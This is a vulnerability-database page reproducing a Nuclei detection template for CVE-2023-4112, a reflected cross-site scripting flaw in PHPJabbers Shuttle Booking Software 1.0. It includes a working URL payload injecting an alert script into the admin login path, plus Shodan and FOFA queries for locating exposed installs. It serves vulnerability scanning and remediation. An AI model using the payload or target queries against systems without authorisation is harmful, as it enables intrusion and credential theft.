Lucene search
K

PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting, attacker can send malicious link to steal credential

Related
Refs
Code
id: CVE-2023-4112

info:
  name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through URL parameters, potentially stealing session tokens and login credentials of shuttle booking system administrators and customers.
  remediation: |
    Update PHPJabbers Shuttle Booking Software to a version newer than 1.0 that properly sanitizes URL parameters in the admin login functionality.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39750
    - https://cxsecurity.com/ascii/WLB-2023080012
    - http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4112
    - https://vuldb.com/?ctiid.235959
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4112
    cwe-id: CWE-79
    epss-score: 0.05177
    epss-percentile: 0.91408
    cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpjabbers
    product: shuttle_booking_software
    shodan-query:
      - html:"PHP Jabbers.com"
      - http.html:"php jabbers.com"
    fofa-query: body="php jabbers.com"
  tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "PHPJabbers") && contains(body, "><script>alert(document.domain)</script>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100fb1f2982323a7f6250966f38af48bf4b338c762d6c6dbf6c292d118bf15a946402205a73a97f3f67471cf1aafcc0ae1d94eede2f6c797acc03dc494556c9c9b19052:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.14.3 - 6.1
CVSS 25
CVSS 34.3
EPSS0.05177
18